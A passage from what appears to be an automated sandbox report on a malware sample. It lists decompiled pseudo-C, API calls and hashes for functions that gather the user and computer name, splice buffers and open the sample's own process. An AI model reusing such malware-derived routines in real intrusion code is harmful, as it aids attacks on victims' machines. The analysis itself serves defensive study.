                                                                                                                                                                                                                                                              • Part of subcall function 0487A0DB: memset.NTDLL ref: 0487A11D
                                                                                                                                                                                                                                                              • Part of subcall function 0487A202: lstrlenW.KERNEL32(0487495C,?,?,04871A97,3D0487C0,80000002,0487495C,0487287E,74666F53,4D4C4B48,0487287E,?,3D0487C0,80000002,0487495C,?), ref: 0487A222
                                                                                                                                                                                                                                                              • Part of subcall function 048770FF: HeapFree.KERNEL32(00000000,00000000,04871545,00000000,?,?,00000000), ref: 0487710B
                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 04871945
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                                                                                                                                                                                                                                            • String ID: \
                                                                                                                                                                                                                                                            • API String ID: 2598994505-2967466578
                                                                                                                                                                                                                                                            • Opcode ID: c85c017cba6f928019b57c218898aed9c989413da5aca4c95db9b28374f52be2
                                                                                                                                                                                                                                                            • Instruction ID: 92737faa19cac5772794b57ce9dd40ee381293ba1d6ab58bbe202cac4c98745a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c85c017cba6f928019b57c218898aed9c989413da5aca4c95db9b28374f52be2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD516F72100209AFDF21AFA4CC68EAA77B9EF04314F008E15FA15D6660E735FD55DB51
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E04873F90() {
                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                                            				long _t43;
                                                                                                                                                                                                                                                            				signed int _t47;
                                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                                            				int _t56;
                                                                                                                                                                                                                                                            				int _t57;
                                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                                            				short* _t66;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                            				GetUserNameW(0,  &_v8);
                                                                                                                                                                                                                                                            				_t39 = _v8;
                                                                                                                                                                                                                                                            				if(_t39 != 0) {
                                                                                                                                                                                                                                                            					_v12 = _t39;
                                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                                            					GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                                            					_t43 = _v8;
                                                                                                                                                                                                                                                            					if(_t43 != 0) {
                                                                                                                                                                                                                                                            						_v12 = _v12 + _t43 + 2;
                                                                                                                                                                                                                                                            						_t63 = E048716F8(_v12 + _t43 + 2 << 2);
                                                                                                                                                                                                                                                            						if(_t63 != 0) {
                                                                                                                                                                                                                                                            							_t47 = _v12;
                                                                                                                                                                                                                                                            							_t66 = _t63 + _t47 * 2;
                                                                                                                                                                                                                                                            							_v8 = _t47;
                                                                                                                                                                                                                                                            							if(GetUserNameW(_t66,  &_v8) == 0) {
                                                                                                                                                                                                                                                            								L7:
                                                                                                                                                                                                                                                            								E048770FF(_t63);
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                                                                                                                                                                                                                                                            								_t52 = _v8;
                                                                                                                                                                                                                                                            								_v12 = _v12 - _t52;
                                                                                                                                                                                                                                                            								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                                                                                                                                                                                                                                                            									goto L7;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									_t56 = _v12 + _v8;
                                                                                                                                                                                                                                                            									_t31 = _t56 + 2; // 0x4878de4
                                                                                                                                                                                                                                                            									_v12 = _t56;
                                                                                                                                                                                                                                                            									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                                                                                                                                                                                                                                                            									_v8 = _t57;
                                                                                                                                                                                                                                                            									if(_t57 == 0) {
                                                                                                                                                                                                                                                            										goto L7;
                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                            										_t63[_t57] = 0;
                                                                                                                                                                                                                                                            										_v16 = _t63;
                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v16;
                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                            0x04873f9e
                                                                                                                                                                                                                                                            0x04873fa1
                                                                                                                                                                                                                                                            0x04873fa4
                                                                                                                                                                                                                                                            0x04873faa
                                                                                                                                                                                                                                                            0x04873faf
                                                                                                                                                                                                                                                            0x04873fb5
                                                                                                                                                                                                                                                            0x04873fbd
                                                                                                                                                                                                                                                            0x04873fc0
                                                                                                                                                                                                                                                            0x04873fc6
                                                                                                                                                                                                                                                            0x04873fcb
                                                                                                                                                                                                                                                            0x04873fd8
                                                                                                                                                                                                                                                            0x04873fe5
                                                                                                                                                                                                                                                            0x04873fe9
                                                                                                                                                                                                                                                            0x04873feb
                                                                                                                                                                                                                                                            0x04873fef
                                                                                                                                                                                                                                                            0x04873ff2
                                                                                                                                                                                                                                                            0x04874002
                                                                                                                                                                                                                                                            0x04874054
                                                                                                                                                                                                                                                            0x04874055
                                                                                                                                                                                                                                                            0x04874004
                                                                                                                                                                                                                                                            0x04874007
                                                                                                                                                                                                                                                            0x0487400e
                                                                                                                                                                                                                                                            0x04874011
                                                                                                                                                                                                                                                            0x04874024
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04874026
                                                                                                                                                                                                                                                            0x04874029
                                                                                                                                                                                                                                                            0x0487402e
                                                                                                                                                                                                                                                            0x0487403c
                                                                                                                                                                                                                                                            0x0487403f
                                                                                                                                                                                                                                                            0x04874047
                                                                                                                                                                                                                                                            0x0487404a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487404c
                                                                                                                                                                                                                                                            0x0487404c
                                                                                                                                                                                                                                                            0x0487404f
                                                                                                                                                                                                                                                            0x0487404f
                                                                                                                                                                                                                                                            0x0487404a
                                                                                                                                                                                                                                                            0x04874024
                                                                                                                                                                                                                                                            0x0487405a
                                                                                                                                                                                                                                                            0x0487405b
                                                                                                                                                                                                                                                            0x04873fcb
                                                                                                                                                                                                                                                            0x04874061

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,04878DE2), ref: 04873FA4
                                                                                                                                                                                                                                                            • GetComputerNameW.KERNEL32(00000000,04878DE2), ref: 04873FC0
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,04878DE2), ref: 04873FFA
                                                                                                                                                                                                                                                            • GetComputerNameW.KERNEL32(04878DE2,?), ref: 0487401C
                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04878DE2,00000000,04878DE4,00000000,00000000,?,?,04878DE2), ref: 0487403F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3850880919-0
                                                                                                                                                                                                                                                            • Opcode ID: f337986011b87dd932130274d7ea8b23824f41250cf5cc7123b69454714d99bd
                                                                                                                                                                                                                                                            • Instruction ID: 9ee48c8635a5fae170ebe93e9f0b859f4df8b6b27237091c20f7cbffbc9287c6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f337986011b87dd932130274d7ea8b23824f41250cf5cc7123b69454714d99bd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB21D671900208EB9B11EFA8D998CEEBBB8EE44704B5049AAE515E7201D734EB44DB60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                                                            			E04877753(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                            				char _t28;
                                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                                            				char* _t42;
                                                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                                                            				int _t51;
                                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t49 = _a4;
                                                                                                                                                                                                                                                            				_t55 = __eax;
                                                                                                                                                                                                                                                            				_v12 = 0xb;
                                                                                                                                                                                                                                                            				if(_t49 != 0 && __eax != 0) {
                                                                                                                                                                                                                                                            					_t5 = _t55 - 1; // -1
                                                                                                                                                                                                                                                            					_t42 = _t49 + _t5;
                                                                                                                                                                                                                                                            					_t28 =  *_t42;
                                                                                                                                                                                                                                                            					_v5 = _t28;
                                                                                                                                                                                                                                                            					 *_t42 = 0;
                                                                                                                                                                                                                                                            					__imp__(_a8, _t41);
                                                                                                                                                                                                                                                            					_v16 = _t28;
                                                                                                                                                                                                                                                            					_t50 =  *0x487d0ec(_t49, _a8);
                                                                                                                                                                                                                                                            					if(_t50 != 0) {
                                                                                                                                                                                                                                                            						 *_t42 = _v5;
                                                                                                                                                                                                                                                            						_t44 = RtlAllocateHeap( *0x487d238, 0, _a16 + __eax);
                                                                                                                                                                                                                                                            						if(_t44 == 0) {
                                                                                                                                                                                                                                                            							_v12 = 8;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t51 = _t50 - _a4;
                                                                                                                                                                                                                                                            							memcpy(_t44, _a4, _t51);
                                                                                                                                                                                                                                                            							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                                                                                                                                                                                                                                            							_t45 = _v16;
                                                                                                                                                                                                                                                            							_t54 = _a16;
                                                                                                                                                                                                                                                            							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                                                                                                                                                                                                                                            							 *_a20 = _t44;
                                                                                                                                                                                                                                                            							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                            							 *_a24 = _t55 - _v16 + _t54;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v12;
                                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                                            0x0487775b
                                                                                                                                                                                                                                                            0x04877760
                                                                                                                                                                                                                                                            0x04877762
                                                                                                                                                                                                                                                            0x04877769
                                                                                                                                                                                                                                                            0x0487777b
                                                                                                                                                                                                                                                            0x0487777b
                                                                                                                                                                                                                                                            0x0487777f
                                                                                                                                                                                                                                                            0x04877781
                                                                                                                                                                                                                                                            0x04877784
                                                                                                                                                                                                                                                            0x04877787
                                                                                                                                                                                                                                                            0x04877790
                                                                                                                                                                                                                                                            0x0487779a
                                                                                                                                                                                                                                                            0x0487779e
                                                                                                                                                                                                                                                            0x048777a3
                                                                                                                                                                                                                                                            0x048777b9
                                                                                                                                                                                                                                                            0x048777bd
                                                                                                                                                                                                                                                            0x0487780e
                                                                                                                                                                                                                                                            0x048777bf
                                                                                                                                                                                                                                                            0x048777bf
                                                                                                                                                                                                                                                            0x048777c7
                                                                                                                                                                                                                                                            0x048777d6
                                                                                                                                                                                                                                                            0x048777db
                                                                                                                                                                                                                                                            0x048777eb
                                                                                                                                                                                                                                                            0x048777f1
                                                                                                                                                                                                                                                            0x048777fc
                                                                                                                                                                                                                                                            0x04877806
                                                                                                                                                                                                                                                            0x0487780a
                                                                                                                                                                                                                                                            0x0487780a
                                                                                                                                                                                                                                                            0x048777bd
                                                                                                                                                                                                                                                            0x04877815
                                                                                                                                                                                                                                                            0x0487781c

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 04877787
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 048777B3
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 048777C7
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 048777D6
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 048777F1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1819133394-0
                                                                                                                                                                                                                                                            • Opcode ID: 61264bb1ffb3ee815814aa571c074e52a12fa864171a3622a4f857b3e9b78a94
                                                                                                                                                                                                                                                            • Instruction ID: a29f8cb7dbab0b7b3391ee99eecec507b1ea8f5616f1ab84946aa0bd0809668f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61264bb1ffb3ee815814aa571c074e52a12fa864171a3622a4f857b3e9b78a94
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6219036A00149AFDF029F6CC898A9EBFB9EF85704F048655FC04A7304CB75E915DBA1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                                                            			E04874380(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				long _t10;
                                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t9 = __eax;
                                                                                                                                                                                                                                                            				_t22 = __eax;
                                                                                                                                                                                                                                                            				if(_a4 != 0 && E048791F1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                                            					return GetLastError();
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t10 = E0487A957(_t9, _t18, _t22, _a8);
                                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                                            					ResetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                                                            					ResetEvent( *(_t22 + 0x20));
                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                            					_push(0xffffffff);
                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                                                                                                                                                                                                                            					if( *0x487d13c() != 0) {
                                                                                                                                                                                                                                                            						SetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t10 = GetLastError();
                                                                                                                                                                                                                                                            						if(_t10 == 0x3e5) {
                                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                                            							_t10 = 0;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(_t10 == 0xffffffff) {
                                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t10;
                                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                                            0x04874380
                                                                                                                                                                                                                                                            0x0487438d
                                                                                                                                                                                                                                                            0x0487438f
                                                                                                                                                                                                                                                            0x048743f2
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048743f2
                                                                                                                                                                                                                                                            0x048743a7
                                                                                                                                                                                                                                                            0x048743ae
                                                                                                                                                                                                                                                            0x048743ba
                                                                                                                                                                                                                                                            0x048743bf
                                                                                                                                                                                                                                                            0x048743c1
                                                                                                                                                                                                                                                            0x048743c3
                                                                                                                                                                                                                                                            0x048743c5
                                                                                                                                                                                                                                                            0x048743c7
                                                                                                                                                                                                                                                            0x048743c9
                                                                                                                                                                                                                                                            0x048743d5
                                                                                                                                                                                                                                                            0x048743e5
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048743d7
                                                                                                                                                                                                                                                            0x048743d7
                                                                                                                                                                                                                                                            0x048743de
                                                                                                                                                                                                                                                            0x048743eb
                                                                                                                                                                                                                                                            0x048743eb
                                                                                                                                                                                                                                                            0x048743eb
                                                                                                                                                                                                                                                            0x048743de
                                                                                                                                                                                                                                                            0x048743d5
                                                                                                                                                                                                                                                            0x048743f0
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048743f6

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,048792E3,?,?,00000000,00000000), ref: 048743BA
                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(?), ref: 048743BF
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 048743D7
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000102,048792E3,?,?,00000000,00000000), ref: 048743F2
                                                                                                                                                                                                                                                              • Part of subcall function 048791F1: lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,0487439F,?,?,?,?,00000102,048792E3,?,?,00000000), ref: 048791FD
                                                                                                                                                                                                                                                              • Part of subcall function 048791F1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0487439F,?,?,?,?,00000102,048792E3,?), ref: 0487925B
                                                                                                                                                                                                                                                              • Part of subcall function 048791F1: lstrcpy.KERNEL32(00000000,00000000), ref: 0487926B
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 048743E5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1449191863-0
                                                                                                                                                                                                                                                            • Opcode ID: 4bdb7c39417b3f536ec666363eee6d07ece0886d2a831725b7c964cb73e08e5d
                                                                                                                                                                                                                                                            • Instruction ID: cfda6935926d8feee14e30dff15cab7f58b4a10cfd4b20dcd269d8b986964bbd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bdb7c39417b3f536ec666363eee6d07ece0886d2a831725b7c964cb73e08e5d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1501A231101211ABEB31AE39DCA8F1BB6A8FF44B64F104F25F155D10E0D661F814DB21
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E048741C2(intOrPtr _a4) {
                                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                                            				void* _t5;
                                                                                                                                                                                                                                                            				long _t6;
                                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                            				 *0x487d26c = _t2;
                                                                                                                                                                                                                                                            				if(_t2 == 0) {
                                                                                                                                                                                                                                                            					return GetLastError();
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                                            				if(_t4 != 5) {
                                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                                            					if(_t13 <= 0) {
                                                                                                                                                                                                                                                            						_t5 = 0x32;
                                                                                                                                                                                                                                                            						return _t5;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                            					 *0x487d25c = _t4;
                                                                                                                                                                                                                                                            					_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                                                            					 *0x487d258 = _t6;
                                                                                                                                                                                                                                                            					 *0x487d264 = _a4;
                                                                                                                                                                                                                                                            					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                                                            					 *0x487d254 = _t7;
                                                                                                                                                                                                                                                            					if(_t7 == 0) {
                                                                                                                                                                                                                                                            						 *0x487d254 =  *0x487d254 | 0xffffffff;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(_t4 > 0) {
                                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t13 = _t4 - _t4;
                                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                            0x048741ca
                                                                                                                                                                                                                                                            0x048741d2
                                                                                                                                                                                                                                                            0x048741d7
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487422c
                                                                                                                                                                                                                                                            0x048741d9
                                                                                                                                                                                                                                                            0x048741e1
                                                                                                                                                                                                                                                            0x048741e9
                                                                                                                                                                                                                                                            0x048741e9
                                                                                                                                                                                                                                                            0x04874229
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04874229
                                                                                                                                                                                                                                                            0x048741eb
                                                                                                                                                                                                                                                            0x048741eb
                                                                                                                                                                                                                                                            0x048741f0
                                                                                                                                                                                                                                                            0x04874202
                                                                                                                                                                                                                                                            0x04874207
                                                                                                                                                                                                                                                            0x0487420d
                                                                                                                                                                                                                                                            0x04874215
                                                                                                                                                                                                                                                            0x0487421a
                                                                                                                                                                                                                                                            0x0487421c
                                                                                                                                                                                                                                                            0x0487421c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04874223
                                                                                                                                                                                                                                                            0x048741e5
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048741e7
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04879A4B,?,?,00000001,?,?,?,04877E84,?), ref: 048741CA
                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000001,?,?,?,04877E84,?), ref: 048741D9
                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04877E84,?), ref: 048741F0
                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04877E84,?), ref: 0487420D
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000001,?,?,?,04877E84,?), ref: 0487422C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2270775618-0
                                                                                                                                                                                                                                                            • Opcode ID: 60a416a65708caab01cdff1b84bdeb024841a23c1739770aa7bf6a50dd115924
                                                                                                                                                                                                                                                            • Instruction ID: c3f18c23c0749709a05001f7a75e369c5cace17dd23d17e0b0e1d042e3569e2b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60a416a65708caab01cdff1b84bdeb024841a23c1739770aa7bf6a50dd115924
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F04970AA43019AE720EF64AD3DB253BA0FB46B46F104E1AE756C71D0D678E842CB24
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 46%
                                                                                                                                                                                                                                                            			E04871565(intOrPtr* __eax) {
                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                            				WCHAR* _v12;
                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                            				short _v48;
                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                            				short _v64;
                                                                                                                                                                                                                                                            				intOrPtr* _t54;
                                                                                                                                                                                                                                                            				intOrPtr* _t56;
                                                                                                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                                                                                                            				intOrPtr* _t58;
                                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                                                            				intOrPtr* _t63;
                                                                                                                                                                                                                                                            				intOrPtr* _t65;
                                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                                            				intOrPtr* _t69;
                                                                                                                                                                                                                                                            				intOrPtr* _t71;
                                                                                                                                                                                                                                                            				intOrPtr* _t74;
                                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                                                                                                            				intOrPtr* _t82;
                                                                                                                                                                                                                                                            				intOrPtr* _t86;
                                                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                                                            				void* _t121;
                                                                                                                                                                                                                                                            				void* _t122;
                                                                                                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                                                                                                            
